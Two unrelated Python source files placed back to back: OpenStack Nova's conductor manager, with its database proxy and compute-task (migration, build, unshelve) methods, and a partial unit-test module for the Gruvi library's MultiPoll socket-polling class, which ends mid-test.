# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles database requests from other nova services."""
from oslo import messaging
import six
from nova.api.ec2 import ec2utils
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import api as compute_api
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova.conductor.tasks import live_migrate
from nova.db import base
from nova import exception
from nova.image import glance
from nova import manager
from nova import network
from nova.network.security_group import openstack_driver
from nova import notifications
from nova.objects import base as nova_object
from nova.objects import instance as instance_obj
from nova.objects import migration as migration_obj
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import quota
from nova.scheduler import rpcapi as scheduler_rpcapi
from nova.scheduler import utils as scheduler_utils
LOG = logging.getLogger(__name__)
# Instead of having a huge list of arguments to instance_update(), we just
# accept a dict of fields to update and use this whitelist to validate it.
allowed_updates = ['task_state', 'vm_state', 'expected_task_state',
'power_state', 'access_ip_v4', 'access_ip_v6',
'launched_at', 'terminated_at', 'host', 'node',
'memory_mb', 'vcpus', 'root_gb', 'ephemeral_gb',
'instance_type_id', 'root_device_name', 'launched_on',
'progress', 'vm_mode', 'default_ephemeral_device',
'default_swap_device', 'root_device_name',
'system_metadata', 'updated_at'
]
# Fields that we want to convert back into a datetime object.
datetime_fields = ['launched_at', 'terminated_at', 'updated_at']
class ConductorManager(manager.Manager):
"""Mission: Conduct things.
The methods in the base API for nova-conductor are various proxy operations
performed on behalf of the nova-compute service running on compute nodes.
Compute nodes are not allowed to directly access the database, so this set
of methods allows them to get specific work done without locally accessing
the database.
The nova-conductor service also exposes an API in the 'compute_task'
namespace. See the ComputeTaskManager class for details.
"""
target = messaging.Target(version='1.64')
def __init__(self, *args, **kwargs):
super(ConductorManager, self).__init__(service_name='conductor',
*args, **kwargs)
self.security_group_api = (
openstack_driver.get_openstack_security_group_driver())
self._network_api = None
self._compute_api = None
self.compute_task_mgr = ComputeTaskManager()
self.quotas = quota.QUOTAS
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.additional_endpoints.append(self.compute_task_mgr)
@property
def network_api(self):
# NOTE(danms): We need to instantiate our network_api on first use
# to avoid the circular dependency that exists between our init
# and network_api's
if self._network_api is None:
self._network_api = network.API()
return self._network_api
@property
def compute_api(self):
if self._compute_api is None:
self._compute_api = compute_api.API()
return self._compute_api
def ping(self, context, arg):
# NOTE(russellb) This method can be removed in 2.0 of this API. It is
# now a part of the base rpc API.
return jsonutils.to_primitive({'service': 'conductor', 'arg': arg})
@messaging.expected_exceptions(KeyError, ValueError,
exception.InvalidUUID,
exception.InstanceNotFound,
exception.UnexpectedTaskStateError)
def instance_update(self, context, instance_uuid,
updates, service=None):
for key, value in updates.iteritems():
if key not in allowed_updates:
LOG.error(_("Instance update attempted for "
"'%(key)s' on %(instance_uuid)s"),
{'key': key, 'instance_uuid': instance_uuid})
raise KeyError("unexpected update keyword '%s'" % key)
if key in datetime_fields and isinstance(value, six.string_types):
updates[key] = timeutils.parse_strtime(value)
old_ref, instance_ref = self.db.instance_update_and_get_original(
context, instance_uuid, updates)
notifications.send_update(context, old_ref, instance_ref, service)
return jsonutils.to_primitive(instance_ref)
@messaging.expected_exceptions(exception.InstanceNotFound)
def instance_get(self, context, instance_id):
return jsonutils.to_primitive(
self.db.instance_get(context, instance_id))
@messaging.expected_exceptions(exception.InstanceNotFound)
def instance_get_by_uuid(self, context, instance_uuid,
columns_to_join=None):
return jsonutils.to_primitive(
self.db.instance_get_by_uuid(context, instance_uuid,
columns_to_join))
# NOTE(hanlind): This method can be removed in v2.0 of the RPC API.
def instance_get_all(self, context):
return jsonutils.to_primitive(self.db.instance_get_all(context))
def instance_get_all_by_host(self, context, host, node=None,
columns_to_join=None):
if node is not None:
result = self.db.instance_get_all_by_host_and_node(
context.elevated(), host, node)
else:
result = self.db.instance_get_all_by_host(context.elevated(), host,
columns_to_join)
return jsonutils.to_primitive(result)
# NOTE(comstud): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
@messaging.expected_exceptions(exception.MigrationNotFound)
def migration_get(self, context, migration_id):
migration_ref = self.db.migration_get(context.elevated(),
migration_id)
return jsonutils.to_primitive(migration_ref)
# NOTE(comstud): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
def migration_get_unconfirmed_by_dest_compute(self, context,
confirm_window,
dest_compute):
migrations = self.db.migration_get_unconfirmed_by_dest_compute(
context, confirm_window, dest_compute)
return jsonutils.to_primitive(migrations)
def migration_get_in_progress_by_host_and_node(self, context,
host, node):
migrations = self.db.migration_get_in_progress_by_host_and_node(
context, host, node)
return jsonutils.to_primitive(migrations)
# NOTE(comstud): This method can be removed in v2.0 of the RPC API.
def migration_create(self, context, instance, values):
values.update({'instance_uuid': instance['uuid'],
'source_compute': instance['host'],
'source_node': instance['node']})
migration_ref = self.db.migration_create(context.elevated(), values)
return jsonutils.to_primitive(migration_ref)
@messaging.expected_exceptions(exception.MigrationNotFound)
def migration_update(self, context, migration, status):
migration_ref = self.db.migration_update(context.elevated(),
migration['id'],
{'status': status})
return jsonutils.to_primitive(migration_ref)
@messaging.expected_exceptions(exception.AggregateHostExists)
def aggregate_host_add(self, context, aggregate, host):
host_ref = self.db.aggregate_host_add(context.elevated(),
aggregate['id'], host)
return jsonutils.to_primitive(host_ref)
@messaging.expected_exceptions(exception.AggregateHostNotFound)
def aggregate_host_delete(self, context, aggregate, host):
self.db.aggregate_host_delete(context.elevated(),
aggregate['id'], host)
@messaging.expected_exceptions(exception.AggregateNotFound)
def aggregate_get(self, context, aggregate_id):
aggregate = self.db.aggregate_get(context.elevated(), aggregate_id)
return jsonutils.to_primitive(aggregate)
def aggregate_get_by_host(self, context, host, key=None):
aggregates = self.db.aggregate_get_by_host(context.elevated(),
host, key)
return jsonutils.to_primitive(aggregates)
# NOTE(danms): This method is now deprecated and can be removed in
# version 2.0 of the RPC API
def aggregate_metadata_add(self, context, aggregate, metadata,
set_delete=False):
new_metadata = self.db.aggregate_metadata_add(context.elevated(),
aggregate['id'],
metadata, set_delete)
return jsonutils.to_primitive(new_metadata)
# NOTE(danms): This method is now deprecated and can be removed in
# version 2.0 of the RPC API
@messaging.expected_exceptions(exception.AggregateMetadataNotFound)
def aggregate_metadata_delete(self, context, aggregate, key):
self.db.aggregate_metadata_delete(context.elevated(),
aggregate['id'], key)
def aggregate_metadata_get_by_host(self, context, host,
key='availability_zone'):
result = self.db.aggregate_metadata_get_by_host(context, host, key)
return jsonutils.to_primitive(result)
def bw_usage_update(self, context, uuid, mac, start_period,
bw_in=None, bw_out=None,
last_ctr_in=None, last_ctr_out=None,
last_refreshed=None,
update_cells=True):
if [bw_in, bw_out, last_ctr_in, last_ctr_out].count(None) != 4:
self.db.bw_usage_update(context, uuid, mac, start_period,
bw_in, bw_out, last_ctr_in, last_ctr_out,
last_refreshed,
update_cells=update_cells)
usage = self.db.bw_usage_get(context, uuid, start_period, mac)
return jsonutils.to_primitive(usage)
# NOTE(russellb) This method can be removed in 2.0 of this API. It is
# deprecated in favor of the method in the base API.
def get_backdoor_port(self, context):
return self.backdoor_port
# NOTE(danms): This method can be removed in version 2.0 of this API.
def security_group_get_by_instance(self, context, instance):
group = self.db.security_group_get_by_instance(context,
instance['uuid'])
return jsonutils.to_primitive(group)
# NOTE(danms): This method can be removed in version 2.0 of this API.
def security_group_rule_get_by_security_group(self, context, secgroup):
rules = self.db.security_group_rule_get_by_security_group(
context, secgroup['id'])
return jsonutils.to_primitive(rules, max_depth=4)
def provider_fw_rule_get_all(self, context):
rules = self.db.provider_fw_rule_get_all(context)
return jsonutils.to_primitive(rules)
def agent_build_get_by_triple(self, context, hypervisor, os, architecture):
info = self.db.agent_build_get_by_triple(context, hypervisor, os,
architecture)
return jsonutils.to_primitive(info)
def block_device_mapping_update_or_create(self, context, values,
create=None):
if create is None:
bdm = self.db.block_device_mapping_update_or_create(context,
values)
elif create is True:
bdm = self.db.block_device_mapping_create(context, values)
else:
bdm = self.db.block_device_mapping_update(context,
values['id'],
values)
# NOTE:comstud): 'bdm' is always in the new format, so we
# account for this in cells/messaging.py
self.cells_rpcapi.bdm_update_or_create_at_top(context, bdm,
create=create)
def block_device_mapping_get_all_by_instance(self, context, instance,
legacy=True):
bdms = self.db.block_device_mapping_get_all_by_instance(
context, instance['uuid'])
if legacy:
bdms = block_device.legacy_mapping(bdms)
return jsonutils.to_primitive(bdms)
def block_device_mapping_destroy(self, context, bdms=None,
instance=None, volume_id=None,
device_name=None):
if bdms is not None:
for bdm in bdms:
self.db.block_device_mapping_destroy(context, bdm['id'])
# NOTE(comstud): bdm['id'] will be different in API cell,
# so we must try to destroy by device_name or volume_id.
# We need an instance_uuid in order to do this properly,
# too.
# I hope to clean a lot of this up in the object
# implementation.
instance_uuid = (bdm['instance_uuid'] or
(instance and instance['uuid']))
if not instance_uuid:
continue
# Better to be safe than sorry. device_name is not
# NULLable, however it could be an empty string.
if bdm['device_name']:
self.cells_rpcapi.bdm_destroy_at_top(
context, instance_uuid,
device_name=bdm['device_name'])
elif bdm['volume_id']:
self.cells_rpcapi.bdm_destroy_at_top(
context, instance_uuid,
volume_id=bdm['volume_id'])
elif instance is not None and volume_id is not None:
self.db.block_device_mapping_destroy_by_instance_and_volume(
context, instance['uuid'], volume_id)
self.cells_rpcapi.bdm_destroy_at_top(
context, instance['uuid'], volume_id=volume_id)
elif instance is not None and device_name is not None:
self.db.block_device_mapping_destroy_by_instance_and_device(
context, instance['uuid'], device_name)
self.cells_rpcapi.bdm_destroy_at_top(
context, instance['uuid'], device_name=device_name)
else:
# NOTE(danms): This shouldn't happen
raise exception.Invalid(_("Invalid block_device_mapping_destroy"
" invocation"))
def instance_get_all_by_filters(self, context, filters, sort_key,
sort_dir, columns_to_join=None,
use_slave=False):
result = self.db.instance_get_all_by_filters(
context, filters, sort_key, sort_dir,
columns_to_join=columns_to_join, use_slave=use_slave)
return jsonutils.to_primitive(result)
# NOTE(hanlind): This method can be removed in v2.0 of the RPC API.
def instance_get_all_hung_in_rebooting(self, context, timeout):
result = self.db.instance_get_all_hung_in_rebooting(context, timeout)
return jsonutils.to_primitive(result)
def instance_get_active_by_window(self, context, begin, end=None,
project_id=None, host=None):
# Unused, but cannot remove until major RPC version bump
result = self.db.instance_get_active_by_window(context, begin, end,
project_id, host)
return jsonutils.to_primitive(result)
def instance_get_active_by_window_joined(self, context, begin, end=None,
project_id=None, host=None):
result = self.db.instance_get_active_by_window_joined(
context, begin, end, project_id, host)
return jsonutils.to_primitive(result)
def instance_destroy(self, context, instance):
result = self.db.instance_destroy(context, instance['uuid'])
return jsonutils.to_primitive(result)
def instance_info_cache_delete(self, context, instance):
self.db.instance_info_cache_delete(context, instance['uuid'])
# NOTE(hanlind): This method is now deprecated and can be removed in
# version v2.0 of the RPC API.
def instance_info_cache_update(self, context, instance, values):
self.db.instance_info_cache_update(context, instance['uuid'],
values)
# NOTE(danms): This method is now deprecated and can be removed in
# version v2.0 of the RPC API.
def instance_type_get(self, context, instance_type_id):
result = self.db.flavor_get(context, instance_type_id)
return jsonutils.to_primitive(result)
def instance_fault_create(self, context, values):
result = self.db.instance_fault_create(context, values)
return jsonutils.to_primitive(result)
# NOTE(kerrin): This method can be removed in v2.0 of the RPC API.
def vol_get_usage_by_time(self, context, start_time):
result = self.db.vol_get_usage_by_time(context, start_time)
return jsonutils.to_primitive(result)
# NOTE(kerrin): The last_refreshed argument is unused by this method
# and can be removed in v2.0 of the RPC API.
def vol_usage_update(self, context, vol_id, rd_req, rd_bytes, wr_req,
wr_bytes, instance, last_refreshed=None,
update_totals=False):
vol_usage = self.db.vol_usage_update(context, vol_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance['uuid'],
instance['project_id'],
instance['user_id'],
instance['availability_zone'],
update_totals)
# We have just updated the database, so send the notification now
self.notifier.info(context, 'volume.usage',
compute_utils.usage_volume_info(vol_usage))
@messaging.expected_exceptions(exception.ComputeHostNotFound,
exception.HostBinaryNotFound)
def service_get_all_by(self, context, topic=None, host=None, binary=None):
if not any((topic, host, binary)):
result = self.db.service_get_all(context)
elif all((topic, host)):
if topic == 'compute':
result = self.db.service_get_by_compute_host(context, host)
# FIXME(comstud) Potentially remove this on bump to v2.0
result = [result]
else:
result = self.db.service_get_by_host_and_topic(context,
host, topic)
elif all((host, binary)):
result = self.db.service_get_by_args(context, host, binary)
elif topic:
result = self.db.service_get_all_by_topic(context, topic)
elif host:
result = self.db.service_get_all_by_host(context, host)
return jsonutils.to_primitive(result)
def action_event_start(self, context, values):
evt = self.db.action_event_start(context, values)
return jsonutils.to_primitive(evt)
def action_event_finish(self, context, values):
evt = self.db.action_event_finish(context, values)
return jsonutils.to_primitive(evt)
def service_create(self, context, values):
svc = self.db.service_create(context, values)
return jsonutils.to_primitive(svc)
@messaging.expected_exceptions(exception.ServiceNotFound)
def service_destroy(self, context, service_id):
self.db.service_destroy(context, service_id)
def compute_node_create(self, context, values):
result = self.db.compute_node_create(context, values)
return jsonutils.to_primitive(result)
def compute_node_update(self, context, node, values, prune_stats=False):
# NOTE(belliott) prune_stats is no longer relevant and will be
# ignored
if isinstance(values.get('stats'), dict):
# NOTE(danms): In Icehouse, the 'stats' was changed from a dict
# to a JSON string. If we get a dict-based value, convert it to
# JSON, which the lower layers now expect. This can be removed
# in version 2.0 of the RPC API
values['stats'] = jsonutils.dumps(values['stats'])
result = self.db.compute_node_update(context, node['id'], values)
return jsonutils.to_primitive(result)
def compute_node_delete(self, context, node):
result = self.db.compute_node_delete(context, node['id'])
return jsonutils.to_primitive(result)
@messaging.expected_exceptions(exception.ServiceNotFound)
def service_update(self, context, service, values):
svc = self.db.service_update(context, service['id'], values)
return jsonutils.to_primitive(svc)
def task_log_get(self, context, task_name, begin, end, host, state=None):
result = self.db.task_log_get(context, task_name, begin, end, host,
state)
return jsonutils.to_primitive(result)
def task_log_begin_task(self, context, task_name, begin, end, host,
task_items=None, message=None):
result = self.db.task_log_begin_task(context.elevated(), task_name,
begin, end, host, task_items,
message)
return jsonutils.to_primitive(result)
def task_log_end_task(self, context, task_name, begin, end, host,
errors, message=None):
result = self.db.task_log_end_task(context.elevated(), task_name,
begin, end, host, errors, message)
return jsonutils.to_primitive(result)
def notify_usage_exists(self, context, instance, current_period=False,
ignore_missing_network_data=True,
system_metadata=None, extra_usage_info=None):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period,
ignore_missing_network_data,
system_metadata, extra_usage_info)
def security_groups_trigger_handler(self, context, event, args):
self.security_group_api.trigger_handler(event, context, *args)
def security_groups_trigger_members_refresh(self, context, group_ids):
self.security_group_api.trigger_members_refresh(context, group_ids)
def network_migrate_instance_start(self, context, instance, migration):
self.network_api.migrate_instance_start(context, instance, migration)
def network_migrate_instance_finish(self, context, instance, migration):
self.network_api.migrate_instance_finish(context, instance, migration)
def quota_commit(self, context, reservations, project_id=None,
user_id=None):
quota.QUOTAS.commit(context, reservations, project_id=project_id,
user_id=user_id)
def quota_rollback(self, context, reservations, project_id=None,
user_id=None):
quota.QUOTAS.rollback(context, reservations, project_id=project_id,
user_id=user_id)
def get_ec2_ids(self, context, instance):
ec2_ids = {}
ec2_ids['instance-id'] = ec2utils.id_to_ec2_inst_id(instance['uuid'])
ec2_ids['ami-id'] = ec2utils.glance_id_to_ec2_id(context,
instance['image_ref'])
for image_type in ['kernel', 'ramdisk']:
image_id = instance.get('%s_id' % image_type)
if image_id is not None:
ec2_image_type = ec2utils.image_type(image_type)
ec2_id = ec2utils.glance_id_to_ec2_id(context, image_id,
ec2_image_type)
ec2_ids['%s-id' % image_type] = ec2_id
return ec2_ids
# NOTE(danms): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
def compute_stop(self, context, instance, do_cast=True):
# NOTE(mriedem): Clients using an interface before 1.43 will be sending
# dicts so we need to handle that here since compute/api::stop()
# requires an object.
if isinstance(instance, dict):
instance = instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), instance)
self.compute_api.stop(context, instance, do_cast)
# NOTE(comstud): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
def compute_confirm_resize(self, context, instance, migration_ref):
if isinstance(instance, dict):
attrs = ['metadata', 'system_metadata', 'info_cache',
'security_groups']
instance = instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), instance,
expected_attrs=attrs)
if isinstance(migration_ref, dict):
migration_ref = migration_obj.Migration._from_db_object(
context.elevated(), migration_ref)
self.compute_api.confirm_resize(context, instance,
migration=migration_ref)
def compute_unrescue(self, context, instance):
self.compute_api.unrescue(context, instance)
def _object_dispatch(self, target, method, context, args, kwargs):
"""Dispatch a call to an object method.
This ensures that object methods get called and any exception
that is raised gets wrapped in an ExpectedException for forwarding
back to the caller (without spamming the conductor logs).
"""
try:
# NOTE(danms): Keep the getattr inside the try block since
# a missing method is really a client problem
return getattr(target, method)(context, *args, **kwargs)
except Exception:
raise messaging.ExpectedException()
def object_class_action(self, context, objname, objmethod,
objver, args, kwargs):
"""Perform a classmethod action on an object."""
objclass = nova_object.NovaObject.obj_class_from_name(objname,
objver)
result = self._object_dispatch(objclass, objmethod, context,
args, kwargs)
# NOTE(danms): The RPC layer will convert to primitives for us,
# but in this case, we need to honor the version the client is
# asking for, so we do it before returning here.
return (result.obj_to_primitive(target_version=objver)
if isinstance(result, nova_object.NovaObject) else result)
def object_action(self, context, objinst, objmethod, args, kwargs):
"""Perform an action on an object."""
oldobj = objinst.obj_clone()
result = self._object_dispatch(objinst, objmethod, context,
args, kwargs)
updates = dict()
# NOTE(danms): Diff the object with the one passed to us and
# generate a list of changes to forward back
for name, field in objinst.fields.items():
if not objinst.obj_attr_is_set(name):
# Avoid demand-loading anything
continue
if (not oldobj.obj_attr_is_set(name) or
oldobj[name] != objinst[name]):
updates[name] = field.to_primitive(objinst, name,
objinst[name])
# This is safe since a field named this would conflict with the
# method anyway
updates['obj_what_changed'] = objinst.obj_what_changed()
return updates, result
# NOTE(danms): This method is now deprecated and can be removed in
# v2.0 of the RPC API
def compute_reboot(self, context, instance, reboot_type):
self.compute_api.reboot(context, instance, reboot_type)
def object_backport(self, context, objinst, target_version):
return objinst.obj_to_primitive(target_version=target_version)
class ComputeTaskManager(base.Base):
"""Namespace for compute methods.
This class presents an rpc API for nova-conductor under the 'compute_task'
namespace. The methods here are compute operations that are invoked
by the API service. These methods see the operation to completion, which
may involve coordinating activities on multiple compute nodes.
"""
target = messaging.Target(namespace='compute_task', version='1.6')
def __init__(self):
super(ComputeTaskManager, self).__init__()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.scheduler_rpcapi = scheduler_rpcapi.SchedulerAPI()
self.image_service = glance.get_default_image_service()
self.quotas = quota.QUOTAS
@messaging.expected_exceptions(exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.MigrationPreCheckError)
def migrate_server(self, context, instance, scheduler_hint, live, rebuild,
flavor, block_migration, disk_over_commit, reservations=None):
if instance and not isinstance(instance, instance_obj.Instance):
# NOTE(danms): Until v2 of the RPC API, we need to tolerate
# old-world instance objects here
attrs = ['metadata', 'system_metadata', 'info_cache',
'security_groups']
instance = instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), instance,
expected_attrs=attrs)
if live and not rebuild and not flavor:
self._live_migrate(context, instance, scheduler_hint,
block_migration, disk_over_commit)
elif not live and not rebuild and flavor:
instance_uuid = instance['uuid']
with compute_utils.EventReporter(context, self.db,
'cold_migrate', instance_uuid):
self._cold_migrate(context, instance, flavor,
scheduler_hint['filter_properties'],
reservations)
else:
raise NotImplementedError()
def _cold_migrate(self, context, instance, flavor, filter_properties,
reservations):
image_ref = instance.image_ref
image = compute_utils.get_image_metadata(
context, self.image_service, image_ref, instance)
request_spec = scheduler_utils.build_request_spec(
context, image, [instance], instance_type=flavor)
try:
hosts = self.scheduler_rpcapi.select_destinations(
context, request_spec, filter_properties)
host_state = hosts[0]
except exception.NoValidHost as ex:
vm_state = instance['vm_state']
if not vm_state:
vm_state = vm_states.ACTIVE
updates = {'vm_state': vm_state, 'task_state': None}
self._set_vm_state_and_notify(context, 'migrate_server',
updates, ex, request_spec)
if reservations:
self.quotas.rollback(context, reservations)
LOG.warning(_("No valid host found for cold migrate"),
instance=instance)
return
try:
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
# context is not serializable
filter_properties.pop('context', None)
# TODO(timello): originally, instance_type in request_spec
# on compute.api.resize does not have 'extra_specs', so we
# remove it for now to keep tests backward compatibility.
request_spec['instance_type'].pop('extra_specs')
(host, node) = (host_state['host'], host_state['nodename'])
self.compute_rpcapi.prep_resize(
context, image, instance,
flavor, host,
reservations, request_spec=request_spec,
filter_properties=filter_properties, node=node)
except Exception as ex:
with excutils.save_and_reraise_exception():
updates = {'vm_state': instance['vm_state'],
'task_state': None}
self._set_vm_state_and_notify(context, 'migrate_server',
updates, ex, request_spec)
if reservations:
self.quotas.rollback(context, reservations)
def _set_vm_state_and_notify(self, context, method, updates, ex,
request_spec):
scheduler_utils.set_vm_state_and_notify(
context, 'compute_task', method, updates,
ex, request_spec, self.db)
def _live_migrate(self, context, instance, scheduler_hint,
block_migration, disk_over_commit):
destination = scheduler_hint.get("host")
try:
live_migrate.execute(context, instance, destination,
block_migration, disk_over_commit)
except (exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.HypervisorUnavailable,
exception.MigrationPreCheckError) as ex:
with excutils.save_and_reraise_exception():
#TODO(johngarbutt) - eventually need instance actions here
request_spec = {'instance_properties': {
'uuid': instance['uuid'], },
}
scheduler_utils.set_vm_state_and_notify(context,
'compute_task', 'migrate_server',
dict(vm_state=instance['vm_state'],
task_state=None,
expected_task_state=task_states.MIGRATING,),
ex, request_spec, self.db)
except Exception as ex:
LOG.error(_('Migration of instance %(instance_id)s to host'
' %(dest)s unexpectedly failed.'),
{'instance_id': instance['uuid'], 'dest': destination},
exc_info=True)
raise exception.MigrationError(reason=ex)
def build_instances(self, context, instances, image, filter_properties,
admin_password, injected_files, requested_networks,
security_groups, block_device_mapping, legacy_bdm=True):
request_spec = scheduler_utils.build_request_spec(context, image,
instances)
# NOTE(alaski): For compatibility until a new scheduler method is used.
request_spec.update({'block_device_mapping': block_device_mapping,
'security_group': security_groups})
self.scheduler_rpcapi.run_instance(context, request_spec=request_spec,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks, is_first_time=True,
filter_properties=filter_properties,
legacy_bdm_in_spec=legacy_bdm)
def _get_image(self, context, image_id):
if not image_id:
return None
return self.image_service.show(context, image_id)
def _delete_image(self, context, image_id):
(image_service, image_id) = glance.get_remote_image_service(context,
image_id)
return image_service.delete(context, image_id)
def _schedule_instances(self, context, image, filter_properties,
*instances):
request_spec = scheduler_utils.build_request_spec(context, image,
instances)
# dict(host='', nodename='', limits='')
hosts = self.scheduler_rpcapi.select_destinations(context,
request_spec, filter_properties)
return hosts
def unshelve_instance(self, context, instance):
sys_meta = instance.system_metadata
if instance.vm_state == vm_states.SHELVED:
instance.task_state = task_states.POWERING_ON
instance.save(expected_task_state=task_states.UNSHELVING)
self.compute_rpcapi.start_instance(context, instance)
snapshot_id = sys_meta.get('shelved_image_id')
if snapshot_id:
self._delete_image(context, snapshot_id)
elif instance.vm_state == vm_states.SHELVED_OFFLOADED:
try:
with compute_utils.EventReporter(context, self.db,
'get_image_info', instance.uuid):
image = self._get_image(context,
sys_meta['shelved_image_id'])
except exception.ImageNotFound:
with excutils.save_and_reraise_exception():
LOG.error(_('Unshelve attempted but vm_state not SHELVED '
'or SHELVED_OFFLOADED'), instance=instance)
instance.vm_state = vm_states.ERROR
instance.save()
try:
with compute_utils.EventReporter(context, self.db,
'schedule_instances',
instance.uuid):
filter_properties = {}
hosts = self._schedule_instances(context, image,
filter_properties,
instance)
host_state = hosts[0]
scheduler_utils.populate_filter_properties(
filter_properties, host_state)
(host, node) = (host_state['host'], host_state['nodename'])
self.compute_rpcapi.unshelve_instance(
context, instance, host, image=image,
filter_properties=filter_properties, node=node)
except exception.NoValidHost as ex:
instance.task_state = None
instance.save()
LOG.warning(_("No valid host found for unshelve instance"),
instance=instance)
return
else:
LOG.error(_('Unshelve attempted but vm_state not SHELVED or '
'SHELVED_OFFLOADED'), instance=instance)
instance.vm_state = vm_states.ERROR
instance.save()
return
for key in ['shelved_at', 'shelved_image_id', 'shelved_host']:
if key in sys_meta:
del(sys_meta[key])
instance.system_metadata = sys_meta
instance.save()
|
|
#
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2014 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import unittest
from gruvi import get_hub, Event
from gruvi.poll import MultiPoll, Poller, READABLE, WRITABLE, check, dump
from support import UnitTest, socketpair, capture_stdio
class TestMultiPoll(UnitTest):
def test_basic(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
check(mp)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
mp.add_callback(READABLE, callback)
check(mp)
called.wait(0.01)
self.assertEqual(cbargs, [])
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE)])
self.assertEqual(s2.recv(10), b'x')
del cbargs[:]; called.clear()
called.wait(0.01)
self.assertEqual(cbargs, [])
mp.close()
check(mp)
s1.close(); s2.close()
def test_multiple(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(arg=0):
def _callback(fd, events):
cbargs.append((fd, events, arg))
called.set()
return _callback
mp.add_callback(READABLE, callback(0))
check(mp)
mp.add_callback(READABLE, callback(1))
check(mp)
mp.add_callback(WRITABLE, callback(2))
check(mp)
mp.add_callback(WRITABLE, callback(3))
check(mp)
called.wait(0.1)
self.assertEqual(cbargs, [(fd, WRITABLE, 2), (fd, WRITABLE, 3)])
del cbargs[:]; called.clear()
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE, 0), (fd, READABLE, 1),
(fd, WRITABLE, 2), (fd, WRITABLE, 3)])
self.assertEqual(s2.recv(10), b'x')
mp.close()
check(mp)
s1.close(); s2.close()
def test_remove(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(arg=0):
def _callback(fd, events):
cbargs.append((fd, events, arg))
called.set()
return _callback
h1 = mp.add_callback(READABLE, callback(0))
check(mp)
h2 = mp.add_callback(READABLE, callback(1))
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE, 0), (fd, READABLE, 1)])
del cbargs[:]; called.clear()
mp.remove_callback(h1)
check(mp)
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE, 1)])
mp.remove_callback(h2)
check(mp)
mp.close()
check(mp)
s1.close(); s2.close()
def test_update(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
h1 = mp.add_callback(READABLE, callback)
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE)])
del cbargs[:]; called.clear()
mp.update_callback(h1, READABLE|WRITABLE)
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE|WRITABLE)])
del cbargs[:]; called.clear()
mp.update_callback(h1, WRITABLE)
check(mp)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, WRITABLE)])
del cbargs[:]; called.clear()
mp.update_callback(h1, 0)
check(mp)
s1.send(b'x')
called.wait(0.01)
self.assertEqual(cbargs, [])
mp.close()
check(mp)
s1.close(); s2.close()
def test_close(self):
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
h1 = mp.add_callback(READABLE, callback)
h2 = mp.add_callback(READABLE, callback)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE), (fd, READABLE)])
del cbargs[:]; called.clear()
mp.close()
called.wait(0.01)
self.assertEqual(cbargs, [])
self.assertRaises(RuntimeError, mp.add_callback, READABLE, callback)
self.assertRaises(RuntimeError, mp.remove_callback, h1)
self.assertRaises(RuntimeError, mp.remove_callback, h2)
self.assertRaises(RuntimeError, mp.update_callback, h1, WRITABLE)
self.assertRaises(RuntimeError, mp.update_callback, h2, WRITABLE)
s1.close(); s2.close()
def test_debug(self):
if not __debug__:
return
s1, s2 = socketpair()
fd = s2.fileno()
mp = MultiPoll(get_hub().loop, fd)
def callback(fd, events):
pass
mp.add_callback(0, callback)
mp.add_callback(READABLE, callback)
mp.add_callback(WRITABLE, callback)
mp.add_callback(READABLE|WRITABLE, callback)
check(mp)
with capture_stdio() as (out, err):
dump(mp)
lines = out.readlines()
